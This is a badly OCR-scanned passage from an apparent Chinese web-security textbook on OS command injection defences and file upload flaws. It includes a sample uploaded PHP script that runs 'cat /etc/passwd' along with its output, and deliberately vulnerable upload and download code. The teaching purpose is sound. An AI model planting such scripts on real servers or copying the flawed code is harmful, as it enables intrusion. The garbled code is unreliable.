在 使 用 之 前 提 到 的 Perl 的 open 函数 时 ， 可 以 采用 以 下 任 一 方法 来 避免 启动 Shell。 


使 用 sysopen 函数 来 代 蔡 open 郴 数 
在 open 函数 的 第 2 个 参数 中 指定 访问 模式 (如 下 ) 
























































open (FL，'<'，S$Sfile) or die ' 错误 消息 'txt') ) ; 











第 2 个 参数 中 能 够 指定 的 访问 模式 如 下 。 


GD 严格 来 说 有 pcntl_exec 函数 ， 但 该 函数 只 能 用 于 CGI 版 的 PHP 中 。 http://php.net/manual/zh/pcntl.installation.php。 
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表 4-18 ”open 语句 的 模式 指定 














模式 说 明 
六 只 读 模 式 
> 读 写 模式 ( 覆盖 ) 
>> 读 写 模式 ( 追加 ) 























人 的 输出 中 取得 数据 

















比如 ， 下 面 的 例子 中 指定 了 |- 模式。 这 是 Perl5.8 以 后 的 版 本 支持 的 写法 。 此 调用 方法 不 经 
过 Shell， 因 此 理论 上 不 会 产生 OS 命令 注入 漏洞 。 





代码 清单 ”/4b/4b-002b.cgi 





#!/usr/bin/perl 
use strict; 

use CGI; 

use utf8; 

use Encode; 


my $q = new CGI; 





my S$mail = $q->param('mail'); 
# 在 不 经 过 Shel1 的 情况 下 将 sendmail 命令 作为 管道 打开 
open (my S$pipe, '|-', '/usr/sbin/sendmail', S$mail) or die $!; 


# 传 入 邮件 内 容 

print S$pipe encode('UTF-8', <<EndOfMail); 

To: Smail 

From: webmaster\@example.jp 

Subject: =?UTF-8?B?5Y+X44GR5LUY44GR44G+44GX44Gf ?= 
Content-Type: text/plain; charset="UTF-8" 





Content-Transfer-Encoding: 8bit 


提问 已 受理 
EndOfMail 











Glose S$pipe; 








# 下 面 为 页 面 显示 
print encode('UTF-8', <<ENdOfHTML); 
Content-Type: text/html; charset=UTF-8 





























<body> 

提问 已 受理 
</body> 
EndOfHTML 























需要 注意 的 一 点 为 ， 与 system 函数 同样 ， 这 里 也 应 该 使 用 多 个 参数 的 形式 来 指定 命令 与 其 
参数 。 因 为 如 果 使 用 /usr/sbin/sendmail $mail 这 种 利用 空格 来 区 分 命令 和 参数 的 形式 ， 
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调用 时 就 会 经 过 Shell， 从 而 也 就 会 引入 OS 命令 注入 漏洞 。 


人 不 将 外 界 输入 的 字符 串 传递 给 命令 行 参数 

只 能 经 过 Shell 调用 OS 命令 的 函数 时 ， 或 者 不 清楚 函数 的 内 部 实现 是 否 经 过 Shell 时 ， 防 范 
OS 命令 注入 漏洞 的 根本 性 策略 就 是 不 将 参数 传递 给 命令 行 。 

下 面 就 让 我 们 结合 具体 例子 来 看 。sendmail 命令 指定 了 -选项 后 ， 收 件 人 邮箱 地 址 就 不 再 在 
命令 行 中 指定 ， 而 是 变 为 从 邮件 的 各 个 消息 头 To、Cc、Bcc 中 读 取 。 采 用 这 个 方法 ， 就 可 以 不 
用 将 外 界 输入 的 字符 串 指 定 给 命令 行 ， 从 而 也 就 消除 了 OS 命令 注入 漏洞 。 

示例 脚本 如 下 。 


代码 清单 ”/4b/4b-002c.php 




















<?php 
Smail = $. POST["'mail]; 
Sh = popen('/usr/sbin/sendmail -t -i', 'w'); 
if ($h === FALSE) { 




















die (' 现在 服务 器 繁忙 ， 请 稍 后 再 试 . . ' ) ; 
} 
fwrite(sh, <<<EndOfMail 
To: S$mail 
From: webmaster@example.jp 
Subject: =?UTF-8?B?5Y+X44GRS5LUY44GR44G+44GX44Gf?= 
Content-Type: text/plain; charset="UTF-8" 














Content-Transfer-Encoding: 8bit 
提问 已 受理 
EndOfMail 


se 
pclose ($h); 











2 
<body> 
提问 已 受理 
</body> 























这 段 脚 本 中 通过 指定 sendmail 的 -t 选 项， 使 得 收 件 人 信息 变 为 从 To 消息 头 中 读 取 。 然 后 又 
使 用 了 PHP 的 popen 和 fwrite 函数 将 邮件 内 容 传 给 sendmail 命令 。 

然而 ， 虽 然 该 脚本 中 消除 了 OS 命令 注入 漏洞 ， 但 还 是 存在 邮件 头 注入 漏洞 。 解 决 方法 请 参 
考 4.9 节 。 





多 使 用 安全 的 函数 对 传递 给 OS 命令 的 参数 进行 转 义 

如 果 使 用 以 上 3 个 方法 都 无 法 消除 OS 命令 注入 漏洞 ， 就 只 能 经 过 Shell 来 调用 OS 命 
令 ， 这 时 就 需要 对 传 给 OS 命令 的 参数 进行 转 义 。 然 而 Shell 的 转 义 规则 颇 为 复杂 ， 所 以 
不 应 该 自己 去 手动 实现 ， 而 是 要 使 用 专门 用 来 安全 转 义 的 程序 库 函 数 。PHP 中 相应 的 函数 
为 escapeshellarg。 
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使 用 escapeshellarg 对 4b-002.php 进行 操作 后 ， 调 用 system 函数 的 部 分 就 被 修改 
如 下 。 


代码 清单 ”/4b/4b-002d.php 








system('/usr/sbin/sendmail <template.txt ' . escapeshellarg ($mail)); 











PHP 中 还 有 与 escapeshellarg 类 似 的 escapeshellcmd 函数 ， 但 是 由 于 使 用 方法 不 当 
时 可 能 会 产生 安全 隐患 ， 因 此 不 推荐 使 用 。 详 情 请 参考 笔者 的 博客 [2]。 
另外 ， 由 于 Shell 转 义 规则 的 复杂 性 以 及 其 他 一 些 环境 相关 的 原因 ， 有 时 即使 使 用 
了 escapeshellarg 也 可 能 无 法 完全 杜绝 安全 隐患 。 因 此 ， 建 议 大 家 配合 使 用 下 面 介绍 的 校 验 
参数 等 辅助 性 对 策 。 
令 OS 命令 注入 攻击 的 辅助 性 对 策 
上 面 介绍 了 防范 OS 命令 注入 漏洞 的 根本 性 对 策 ， 但 由 于 对 策 的 执行 过 程 中 稍 有 玻 漏 就 会 造 
成 极 大 影响 ， 因 此 ， 为 了 减少 攻击 造成 的 损害 ， 建 议 配 合 实施 以 下 辅助 性 对 策 。 
校 验 参 数 
将 运行 应 用 的 权限 设 为 所 需 的 最 低 权 限 
给 Web 服务 需 上 的 OS 或 中 间 件 更 新 安全 补丁 
下 面 就 让 我 们 来 依次 看 一 下 以 上 各 项 。 
































今 校 验 参 数 

4.2 节 中 讲 过 ， 外 界 的 输入 值 应 当 以 应 用 的 需求 为 基准 进行 校 验 ， 而 输入 值 校 验 有 时 也 具有 
防范 OS 命令 注入 的 效果 。 特 别 是 在 经 过 Shell 调用 OS 命令 的 情况 下 ， 最 好 对 参数 字符 串 的 字 
符 种 类 加 以 限制 。 

例如 ， 将 文件 名 传 给 OS 命令 的 参数 时 ， 如 果 应 用 需求 中 将 文件 名 限定 为 仅 包 含 字母 或 数 
字 ， 那 么 即使 应 用 中 忘 了 进行 转 义 处 理 ，OS 命令 注入 攻击 也 无 法 得 逮 。 

















仿 将 运行 应 用 的 权限 设 为 所 需 的 最 低 权 限 

遭 到 OS 命令 注入 攻击 后 ， 由 于 命令 执行 权限 即 为 Web 应 用 所 持 有 的 权限 ， 因 此 将 Web 应 
用 的 权限 设 为 所 需 的 最 低 权 限 ， 就 能 够 将 攻击 造成 的 损害 程度 控制 到 最 低 。 

将 用 户 权限 设 为 所 需 的 最 低 权 限 ， 对 防范 目录 遍历 漏洞 也 同样 有 效 。 





























仿 给 Web 服务 器 上 的 OS 或 中 间 件 更 新 安全 补丁 

服务 器 在 内 部 受到 针对 操作 系统 漏洞 的 攻击 ( Local Exploit ) 时 ，OS 命令 注入 攻击 造成 的 危 
害 程度 最 大 。 通 常情 况 下 ， 攻 击 造 成 的 损害 受 限于 操作 Web 服务 需 的 用 户 权 限 ， 而 内 部 攻击 的 
情况 下 ,一 旦 攻击 者 获取 到 了 root 权限 ， 就 能 够 对 服务 需 为 所 欲 为 。 
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因此 ， 即 使 是 不 会 受到 外 部 攻击 的 安全 隐患 ， 也 最 好 能 够 为 系统 更 新 安全 补丁 等 。 详 情 请 参 
考 7.1 节 。 


参考 : 内 部 调用 Shell 的 函数 
作为 参考 ， 下 面 对 各 个 编程 语言 中 内 部 调用 Shell 的 函数 进行 了 归纳 。 在 开发 过 程 中 ， 建 议 
不 要 使 用 下 面 列 出 的 这 些 函 数 ， 而 如 果 不 得 不 使 用 的 话 ， 则 应 该 选择 不 经 过 Shell 的 调用 方式 。 


PHP 








system() exec () passthru() proc_open() popen () 





shell exec() 














Perl 

exec () system() S ~ GE open () 
Ruby 

exec () system() ~ 





















































注 : Ruby 中 也 能 够 像 Perl 一 样 使 用 管道 符号 启动 Shell。 例 如 使 用 File.open() 来 代替 open()， 就 不 用 担心 调用 Shell 的 问题 了 。 
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4.12 ”文件 上 传 相关 的 问题 


有 些 Web 应 用 能 让 用 户 上 传 并 公开 图 像 文件 或 PDF 文档 。 而 本 节 就 将 讲述 用 户 上 传 或 下 载 
文件 时 容易 产生 的 安全 隐患 。 


4.12.1 文件 上 传 问题 的 概要 
针对 文件 上 传 功能 的 攻击 类 型 有 如 下 几 种 。 


针对 上 传 功能 的 DoS 攻击 
使 上 传 的 文件 在 服务 器 上 作为 脚本 执行 
诱 使 用 户 下 载 恶 意 文 件 
越权 下 载 文件 
下 面 我 们 就 来 依次 看 一 下 上 述 的 各 种 攻击 类 型 。 


令 针 对 上 传 功能 的 DoS 攻击 
使 用 Web 应 用 的 上 传 功能 连续 发 送 体积 巨大 的 文件 时 ， 就 可 能 会 形成 使 网 站 负荷 过 载 的 
DoS 攻击 ( Denial of Service Attack， 拒 绝 服务 攻击 )。 




















图 4-102 针对 上 传 功 能 的 DoS 攻击 


总 


击 对 象 服务 器 











服务 器 宕 机 





攻击 者 
"上 传 巨大 文件 
* 连续 的 请 求 
Dosg 攻击 会 造成 应 用 的 响应 速度 下 降 ， 严 重 时 还 会 造成 服务 器 罕 机 等 。 
防范 Dog 攻击 的 一 种 有 效 策略 为 限制 上 传 文件 的 容量 。PHP 能 够 在 php.ini 中 设置 上 传 功能 
的 容量 限制 。 表 4-19 中 列 出 了 与 文件 上 传 相 关 的 配置 项 。 建 议 在 满足 应 用 需求 的 前 提 下 尽量 将 
值 设 置 得 小 一 些 。 如 果 应 用 不 提供 文件 上 传 功能 ,那么 只 需 将 fle_uploads 设 为 Off 即 可 。 
详情 请 参考 PHP 的 官方 文档 ( http://php.net/manual/zh/ini.core.php )。 
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表 4-19 php.ini 中 与 文件 上 传 相关 的 配置 项 





设置 项 目 名 






















































































解说 默认 值 
file_uploads 是 否 人 允许 使 用 文件 上 传 功能 On 
upload_max_filesize 单个 文件 的 最 大 容量 2MB 
max_file_uploads 单 次 请 求 最 大 文件 上 传 个 数 20 
post_max_size POST 请 求 正文 的 最 大 限制 8MB 
memory_limit 脚本 所 能 申请 到 的 最 大 内 存 值 128MB 


























另外 ,设置 Apache 的 httpd.conf 也 能 限制 请 求 正 文 的 最 大 字 节 数 。 而 且 此 设置 也 适用 于 
PHP 以 外 的 情况 。 通 过 在 前 期 的 检验 中 将 不 合法 的 请 求 拒 之 门 外 ， 能 够 有 效 提 高 防御 DoS 的 能 
力 。 以 下 设置 为 将 请 求 正 文 限 制 在 100K 以 内 。 





LimitRequestBody 102400 











关于 PHP 和 Apache 以 外 的 工具 中 限 





关上 传 文件 容量 的 设置 方法 ， 请 参考 相关 的 文档 。 


人 












































前 面 提 到 的 内 容 都 只 是 校 验 了 上 传 文件 的 容量 ， 而 为 了 能 够 更 好 地 防御 DoS 攻击 ， 还 应 该 












































































































































































































































对 其 他 参数 也 进行 校 验 。 例 如 ， 在 服务 器 上 处 理 图 像 文件 时 ， 比 起 压缩 后 图 像 文件 的 大 小 ， 解 压 
后 图 像 所 占用 的 内 存 容量 更 容易 出 问题 。 

寻 此 ， 为 了 能 够 正确 估算 解压 后 的 内 存 使 用 量 ， 我 们 就 不 能 仅仅 着 眼 于 所 接收 的 文件 大 小 ， 
还 需要 确定 图 像 的 尺寸 及 色 数 的 上 限 值 ， 并 尽量 在 早期 进行 校 验 处 理 。 

同样 ， 在 执行 使 CPU 负担 过 重 的 处 理 时 ， 也 需要 事先 对 CPU 资源 ( CPU 的 使 用 时 间 和 执 
行 时间 ) 进行 估算 ， 并 限制 相关 的 参数 。 

















令 使 上 传 的 文件 在 服务 器 上 作为 脚本 执行 
如 果 用 户 上 传 的 文件 被 保存 在 Web 服务 器 的 公开 目录 中 ， 外 界 上 传 的 脚本 文件 就 有 可 能 在 





Web 服务 右上 被 执行 。 


OD http://httpd.apache.org/docs/2.2/en/mod/core.html#limitrequestbody 
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4-103 ”在 服务 器 上 执行 上 传 的 脚本 











攻击 对 象 服务 器 
攻击 者 中 上 传 PHP 脚本 
attack.php l 
居 (@@ PHP 脚本 被 保存 
9 EE: 
(BG) 调用 attack.php 3 





attack.php 
个 脚 本 被 执行 
攻击 其 他 言 息 
服务 器 篡改 文件 


如 果 执行 了 外 界 传人 的 脚本 ， 就 会 造成 与 4.11 节 讲 述 的 OS 命令 注入 攻 击 同 样 的 影响 。 具 体 
表现 为 ， 信 息 被 泄漏 、 文 件 被 算 改 、 其 他 服务 絮 遭 到 攻击 等 。 详 情 请 参考 4.12.2 节 。 











令 诱 使 用 户 下 载 恶 意 文件 
针对 文件 上 传 功能 的 第 3 种 攻击 方式 为 上 传 恶意 文件 并 诱 使 用 户 下 载 ， 一旦 用 户 浏览 了 该 恶 
意 文件 ， 其 PC 就 会 执行 JavaScript 脚本 或 者 感染 病毒 等 。 


4-104 ” 诱 使 用 户 下 载 恶 意 文件 























攻击 者 i 攻击 对 象 服务 器 
attack.pdf | 
全 


人 @) 浏览 attack.pdf ee 
人 @O) 恶意 文件 被 公开 





attack.pdf 


























感染 病毒 
执行 JavaScript 


然而 ， 这 时 可 能 会 有 读者 产生 这 样 的 疑问 ， 用 户 只 是 下 载 了 文件 ， 怎 么 会 造成 JavaScript 脚 
本 被 执行 呢 ? 这 是 因为 攻击 者 能 通过 一 些 手段 使 浏览 器 将 其 上 传 的 文件 误 认 为 是 HTML。 详 情 
将 在 4.12.3 节 中 进行 说 明 。 

此 外 ， 下 载 文件 会 导致 PC 感染 病毒 则 是 因为 攻击 者 恶意 利用 了 用 来 打开 文件 的 软件 中 存在 
的 漏洞 。 

下 载 文件 造成 病毒 感染 ， 虽 然 直 接 原因 在 于 上 传 恶 意 文 件 的 用 户 ， 但 有 时 网 站 的 运营 方 也 负 
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一 定 责任 。 因 此 ， 在 决定 网 站 的 服务 内 容 时 ， 应 当 根 据 网 站 的 性 质 决 定 是 否 对 亚 意 软件 采取 措 


令 越权 下 载 文件 

即使 上 传 后 的 文件 只 允许 特定 的 用 户 下 载 ， 有 时 也 会 出 现 没 有 下 载 权限 的 用 户 也 能 够 下 载 文 
件 的 问题 。 此 类 问题 的 原因 多 数 为 没有 对 文件 设置 访问 权限 ， 从 而 导致 用 户 通过 推测 URL 而 成 
功 下 载 到 了 没有 下 载 权限 的 文件 。 

此 问题 将 在 5.3 节 中 详 述 。 



































4.12.2 通过 上 传 文件 使 服务 器 执行 脚本 


概要 
有 些 文件 上 传 处 理会 将 用 户 上 传 的 文件 保存 至 Web 服务 器 的 公开 目录 中 。 这 时 ， 如 果 应 用 
中 人 允许 上 传 文件 的 扩展 名 为 php 、asp 、aspx、jsp 等 脚本 文件 的 扩展 名 ， 用 户 就 能 在 服务 器 上 将 
上 传 的 文件 作为 脚本 执行 。 
如 果 外 界 传人 的 脚本 在 服务 器 上 被 执行 ， 就 会 造成 与 OS 命令 注入 同样 的 影响 ， 具 体 如 下 。 
浏览 、 算 改 或 删除 Web 服务 器 内 的 文件 


对 外 发 送 邮件 
攻击 其 他 服务 器 ( 称 为 垫 脚 石 ) 


为 了 防范 通过 上 传 文件 而 在 服务 器 上 执行 脚本 ， 可 以 综合 实施 以 下 两 种 方法 ， 或 者 实施 其 中 
的 任意 一 种 。 


不 将 用 户 上 传 的 文件 保存 在 公开 目录 中 ,浏览 文件 需 通过 脚本 
将 文件 的 扩展 名 限定 为 不 可 执行 的 脚本 文件 




















通过 上 传 文件 使 服务 器 执行 脚本 的 安全 隐患 总 览 


产生 地 点 

提供 文件 上 传 功能 的 页 面 
三 三 影响 范围 
到 所 有 页 面 












































0 响 类 型 

信息 泄漏 、 自 改 或 删除 数据 、 向 外 部 发 动 DoS 攻击 、 使 系统 停止 等 
CS 影响 程度 

全 
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多 用 户 参 与 程度 
不 需要 


对 策 概要 


实施 以 下 两 项 或 任 选 其 一 
-- 不 将 用 户 上 传 的 文件 保存 在 公开 目录 中 ， 浏 览 文件 需 通过 脚本 
一 将 文件 的 扩展 名 限定 为 不 可 执行 的 脚本 文件 



























































攻击 手段 与 影响 
接 下 来 我 们 就 来 看 一 下 通过 上 传 文件 而 使 服务 器 端 执行 脚本 的 攻击 模式 及 其 影响 。 
人 示例 脚本 解说 


以 下 为 使 用 户 上 传 图 像 文 件 并 将 该 图 像 在 页 面 上 显示 出 来 的 PHP 脚本 。 首 先 来 看 文件 上 传 
页 面 。 可 以 看 出 ， 上 传 文件 的 form 元 素 的 enctype 属性 被 指定 为 了 "multipart/form-data"。 











代码 清单 ”/4c/4c-001.php 





<body> 

<form action="4c-002.php" method="POST" 
enctype="multipart/form-data"> 

文件 : <input type="file" name="imgfile" size="20"><br> 

<input type="submit" value=" 上 传 "> 

</form> 

</body> 

















而 以 下 脚本 的 作用 就 是 接收 文件 后 将 其 保存 在 /4c/img/ 目录 中 ， 并 在 页 面 上 显示 出 来 。 


代码 清单 ”/4c/4c-002.php 








<?php 
$stmpfile = $ FILES["imgfile"] ["tmp name"] ; // 临时 文件 名 
$tofile = $ FILES["imgfile"] ["name"]; // 原文 件 名 


if (! is uploadeqd file($tmpfile)) { // 判断 文件 是 否 已 经 上 传 
die(' 文件 没有 上 传 ') ; 

// 将 图 像 文件 移动 至 img 目录 

} else if (! move uploaded file($tmpfile, 'img/' . S$tofile)) { 
die(' 无 法 上 传 文件 ' ) ; 

} 


$imgurl = 'img/' . urlencode (Stofile) ; 



































2 

<body> 

<a href="<?php echo htmlspecialchars ($imgurl); ?>"><?php 

echo htmlspecialchars ($tofile, ENT NOQUOTES, 'UTF-8'); ?></a> 
已 上 传 <br> 
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<img src="<?php echo htmlspecialchars ($imgurl); ?>"> 
</body> 





正常 情况 下 的 执行 过 程 如 下 所 示 。 
4-105 示例 脚本 的 执行 范例 ( 正常 情况 ) 































































































| [EISl | 品 | 量 j 

OO [El htp//examplejp/ac/ac-001php [3 [x ||S sing Pp- OO | 加 hp//examplejp/adse-002php [3[x | sing Pr 

遍 上 三 夫 | 税 htpy//examplejp/4c/4c-001.php ; IAO)™ 帘 收 夫 | 丰 htpy/examplejp/4c/4c-002.php | I 上 (OO) ~ 

文件 ，WWASBOOKelephant.png Dj 可- , elephant png 已 上 传 完毕 

匡 到 上 传 

一 
4 
专栏 : 警惕 文件 名 中 的 XSS COLUMN 


4c-002.php 中 生成 图 像 文 件 的 URL 时 ， 会 通过 urlencode 函数 对 文件 名 进行 百 分 号 编码 ， 
并 在 显示 处 理 中 执行 HTML 转 义 。 这 些 都 是 必要 的 处 理 。Unix 允许 在 文件 名 中 使 用 <、>、 "等 
字符 ， 因 此 需要 根据 所 在 位 置 进行 相应 的 转 义 处 理 。 当 然 这 些 都 不 是 新 鲜 的 内 容 ， 只 是 照 理 实 施 
XSS 的 防范 策略 而 已 。 












































4 PHP 脚本 的 上 传 与 执行 
下 面 就 让 我 们 来 看 一 下 攻击 的 例子 。 这 里 假设 用 户 上 传 的 不 是 图 像 文 件 ， 而 是 以 下 PHP 脚 
本 文件 。 


代码 清单 ”4c-900.php 








<pre> 
<?php 
system('/bin/cat /etc/passwd'); 








</pre> 





这 段 PHP 脚本 的 作用 在 于 通过 system 函数 调用 系统 命令 cat 来 显示 etc/passwd 文件 的 内 
容 。 上 传 该 PHP 脚本 文件 后 ， 浏 览 右 的 页 面 显示 如 下 图 所 示 。 由 于 4c-900.php 并 非 标 准 的 图 像 
文件 ， 因 此 页 面 上 显示 为 红 叉 。 
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图 4-106 上 传 7 PHP 脚本 
税 http://examplejp/4c/4c-002.php - Windows Internet Explorer 


和 可口 © | 加 http/examplejp/4c/4c-002.php ™ | [XS ing Pr- 























次 Ms 夫 | 镍 htp//examplejp/4c/4c-002.php | | : IRO)™ 





器 中 已 上 传 完毕 
x 











接 下 来 点 击 4c-900.php 链接 ， 就 能 使 浏览 器 显示 刚才 上 传 的 PHP 脚本 文件 。 如 图 4-107 所 
示 ， 点 击 后 页 面 上 显示 了 etc/passwd 文件 的 内 容 。 由 此 可 以 得 知 上 传 的 PHP 脚本 在 服务 器 上 被 
成 功 执 行 了 。 

图 4-107 上 传 的 PHP 脚本 在 服务 器 上 被 执行 


「 异 http://example.jp/4c/img/4c-900.php - Window... EN Meh 
OO v | 加 http://example,jp/4c/img/4c-900.php ” | 加 x 


帘 咬 |@ httpi/example jp/acfmg/4e-900: 名 全 -> 


root:x:0:0:root:/root:/bin/bash 























:1:daemon:/usr/sbin: /hin/sh [| 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
* MN | 上 































上 传 的 脚本 文件 在 服务 器 上 被 执行 造成 的 影响 与 0S 命令 注入 相同 。 由 于 system 和 
passthru 等 函数 都 能 用 来 调用 OS 命令 ， 因 此 攻击 者 就 能 够 执行 当前 操作 系统 账号 权限 范围 内 
的 所 有 操作 。 














安全 隐患 的 产生 原因 
上 传 的 文件 能 被 作为 脚本 执行 这 一 安全 隐患 的 产生 需 满足 如 下 两 项 条 件 。 


上 传 的 文件 被 保存 至 公开 目录 
上 传 后 的 文件 扩展 名 能 被 指定 为 .php 或 .asp 等 表示 脚本 的 扩展 名 


如 果 应 用 中 的 上 传 功能 满足 了 上 述 两 项 条 件 ， 就 会 滋生 安全 隐患 。 因 此 ， 防 范 策略 为 至 少 消 
除 上 述 两 项 条 件 中 的 任意 一 项 。 


对 策 

正如 前 项 所 介绍 的 那样 ， 用 户 上 传 的 文件 能 被 作为 脚本 执行 的 条 件 为 以 下 两 项 : 文件 被 保存 
在 公开 目录 中 以 及 用 户 能 指定 文件 扩展 名 为 可 执行 的 脚本 文件 。 因 此 ， 消 除 上 述 任意 一 项 条 件 就 
能 防范 安全 隐患 。 而 考虑 到 如 果 仅 限制 文件 的 扩展 名 很 有 可 能 会 产生 朴 漏 ， 因 此 ， 这 里 我 们 将 主 
要 介绍 另 一 种 对 策 方 法 ， 即 不 将 文件 保存 在 公开 目录 中 。 

为 了 避免 将 上 传 的 文件 保存 在 公开 目录 中 ， 下 载 文 件 时 就 需要 经 过 脚本 。 本 书 把 此 类 脚本 称 
为 “下 载 脚本 ”。 
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使 用 下 载 脚本 将 4c-002.php 加 以 改良 ,结果 如 下 所 示 。 


代码 清单 ”/4c/4c-002a.php 





<?php 
function get upload file name ($tofile) { /* 省 略 */ } 





$stmpfile = $ FILES["imgfile"] ["tmp name"]; 

$orgfile = $ FILES["imgfile"] ["name"]; 

if (! is uploaded file($tmpfile)) { 
die(' 文件 没有 上 传 ') ; 

} 

stormmen aqet nupload tennamel(S ong 

if (! move uploaded file($tmpfile, S$tofile)) { 
die(' 无 法 上 传 文件 '); 

} 








Siumouri A O00 np et asenanel( oe 

2 

<body> 

<a href="<?php echo htmlspecialchars ($imgurl); ?>"><?php 

echo htmlspecialchars ($orgfile, ENT NOQUOTES, 'UTF-8'); ?></a> 
已 上 传 <br> 

<img src="ERphpiechnomemlspecr elon mo "> 

</body> 











可 以 看 出 ， 上 述 脚本 对 原先 脚本 做 了 2 处 修改 。 首 先 ， 将 文件 的 保存 场所 从 公开 目录 ( /4c/img ) 
改 为 了 由 get_upload file _ name 图 数 返 回 的 文件 名 。 另 外 ， 取 得 图 像 的 URL 时 使 其 经 过 了 
下 载 脚本 。get_upload file name 国 数 的 源码 如 下 所 示 。 





代码 清单 ”、/4c/4c-002a.php ( get_upload_file_name 的 定义 ) 





define('UPLOADPATH', '/var/upload'); 


function get upload file name (Stofile) { 
// 校 验 扩展 名 
$info = pathinfo($tofile); 
Sext = strtolower ($info['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
if ($ext != 'gif' && S$ext != 'jpg' && $ext != 'png') { 
die (' 只 能 上 传 扩展 名 为 gif、jpg 或 png 的 图 像 文件 '); 
} 
// 下 面 的 处 理 为 生成 唯一 的 文件 名 
$count = 0; // 尝试 生成 文件 名 的 次 数 






























































do { 
// 生成 文件 名 
$file = sprintf('%s/%08x.%s', UPLOADPATH, mt rand(), S$ext); 








// 生成 文件 ， 如 果 文 件 已 存在 则 报错 

$fp = @fopen ($file, 'x'); 
} while ($fp === FALSE && ++$count < 10); 
if ($fp === FALSE) { 

die(' 无 法 生成 文件 '); 
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} 
fclose ($fp); 
return Sfile; 


} 





get_upload file_name 限 数 中 首先 确保 文件 的 扩展 名 为 gsif、jpg 或 png。 

接着 , 利用 随机 数 生成 包含 了 原来 扩展 名 的 唯一 的 文件 名 , 并 检验 文件 名 是 否 有 重复 。 文 件 
名 被 生成 后 ， 再 使 用 指定 了 ' x' 选项 的 fopen 来 打开 文件 ， 这 样 当 文件 已 经 存在 时 就 会 进入 错 
误 处 理 。 出 错 后 会 不 断 循环 执行 fopen 直到 不 出 错 为 止 , 但 考虑 到 还 存在 文件 名 冲突 以 外 的 异 
篆 而 导致 出 错 的 情况 ， 因 此 ， 如 果 生 成 文件 名 处 理 超 过 10 次 的 话 就 中 止 此 处 理 。 

随后 将 文件 关闭 ， 但 不 删除 生成 的 文件 ， 而 是 通过 move_uploaded _ file 困 数 覆盖 原文 
件 。 如 果 将 文件 删除 ， 就 无 法 保证 文件 名 的 唯一 性 。 

下 面 为 下 载 脚本 4c-003.php 的 源码 。 


代码 清单 ”/4c/4c-003.php 


































































































<?php 
// 注意 : 该 下 载 脚本 中 包含 跨 站 脚本 漏洞 
// 
define('UPLOADPATH', '/var/upload'); 
Smimes = array('gif' => 'image/gif', 'jpg' => 'image/jpeg', 
'png' => 'image/png',); 
$f1 le E: $ GETLV FLLeT]: 
$info = pathinfo ($file); // 取得 文件 信息 
Sext = strtolower ($info['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
$content _ type = $mimes [$ext]; // 取得 Content -Type 
if (! $content type) { 
die(' 只 能 上 传 扩 展 名 为 gif、jpg 或 png 的 图 像 文件 ') ; 
} 
header('Content-Type: ' . $content type); 
readfile(UPLOADPATH . '/' . basename ($file)); 
?> 




















上 述 脚本 是 从 查询 字符 串 file 中 取得 文件 名 的 。 首 先 获取 扩展 名 ， 如 果 不 是 gif、jpg 或 
png 就 报错 。 接 着 输出 与 各 扩展 名 相对 应 的 Content-Type， 然 后 再 使 用 readfile 函数 读 取 文 件 
内 容 并 将 其 输出 。 这 里 将 从 查询 字符 串 中 取得 的 文件 名 经 过 basename 函数 进行 处 理 是 为 了 防 
范 目 录 遍 历 漏洞 (参考 4.10 节 ) 

实施 以 上 防范 策略 之 后 ， 用 户 上 传 的 文件 在 服务 器 端 被 作为 脚本 执行 这 一 安全 隐患 就 能 够 得 
以 消除 。 但 是 ， 如 果 用 户 使 用 的 是 Internet Explorer (IE ) 浏览 器 ， 上 述 脚 本 就 有 遭 到 跨 站 脚本 攻 
击 的 风险 。 此 问题 将 在 下 一 节 讲 述 。 

















中 此 处 将 PHP 的 官方 文档 中 的 示例 脚本 http://www.php.netmanual/zh/function .tempnam.phpf98232 进行 了 改良 。 
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为 了 防范 通过 上 传 文件 而 使 服务 器 执行 脚本 ， 本 书 介 绍 了 使 用 下 载 脚本 的 方法 。 而 如 果 只 
是 为 了 防范 文件 被 当 作 脚 本 执行 ， 也 能 够 采取 校 验 文件 扩展 名 的 方法 ， 只 是 实施 周密 的 校 验 并 
不 容易 。 
举例 来 说 ， 使 用 名 为 SSI ( Server Side Include ) 的 功能 就 能 将 HTML 中 引入 ( Include ) 的 
i 令 ( Command ) 执行 。 虽然 使 用 SS| 的 HTML 文件 的 标准 扩展 名 为 shtml， 但 是 有 
时 通过 设置 也 能 使 扩展 名 为 html 的 文件 允许 SSI 功能 。 换 言 之 ， 有 些 情况 下 也 需要 把 扩展 名 为 
html eh 
由 此 可 见 ， 应 该 将 哪些 扩展 名 归 类 为 可 执行 的 脚本 文件 是 不 确定 的 。 因 此 ， 校 验 扩展 名 时 
推荐 只 允许 所 需 的 最 低 限度 。 另 外 ， 如 果 没 有 特殊 理由 ， 还 是 推荐 使 用 下 载 脚 本 的 方法 来 加 以 
应 对 。 





















































































































































































































































4.12.3 ”文件 下 载 引起 的 跨 站 脚本 


概要 


当 用 户 下 载 已 上 传 的 文件 时 ， 浏 览 器 有 时 会 不 能 正确 识别 文件 的 类 型 。 比 如 ， 尽 管 应 用 中 认 
定 某 文件 为 PNG 格式 ， 但 如 果 该 图 像 文件 的 数据 中 包含 HTML 标签 ， 在 某 些 条 件 下 浏览 器 就 会 
将 其 误 认 为 HTML 文件 ， 从 而 便 会 执行 图 像 文件 中 的 JavaScript。 这 就 是 文件 下 载 引 起 的 跨 站 脚 
本 (XSS )。 

攻击 者 会 通过 上 传 嵌入 HTML 或 JavaScript 的 图 像 文件 或 PDF 文件 来 对 此 漏洞 发 起 攻击 。 
虽然 用 常规 的 方法 阅览 时 ， 这 些 恶 意 文件 并 不 会 被 识别 为 HTML， 但 是 攻击 者 会 使 用 一 些 伎 
俩 促使 上 传 的 文件 被 识别 为 HTML。 而 一 旦 用 户 的 浏览 器 将 文件 识别 为 HTML，XSS 攻击 就 成 
功 了 。 

文件 下 载 引起 的 XSS 攻击 所 造成 的 影响 ， 与 4.3.1 节 讲 述 的 影响 一 样 。 

为 此 ， 可 通过 采取 如 下 对 策 来 防范 文件 下 载 引 起 的 XSS 漏洞 。 

正确 设置 文件 的 Content-Type 
确保 图 像 文件 的 扩展 名 与 内 容 ( 图 像 文件 头 ) 相符 
判定 为 用 于 下 载 的 文件 时 ， 在 响应 头 中 指定 Content-Disposition:attachment 
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文件 下 载 引 起 的 XSS 漏洞 总 览 


产生 地 点 
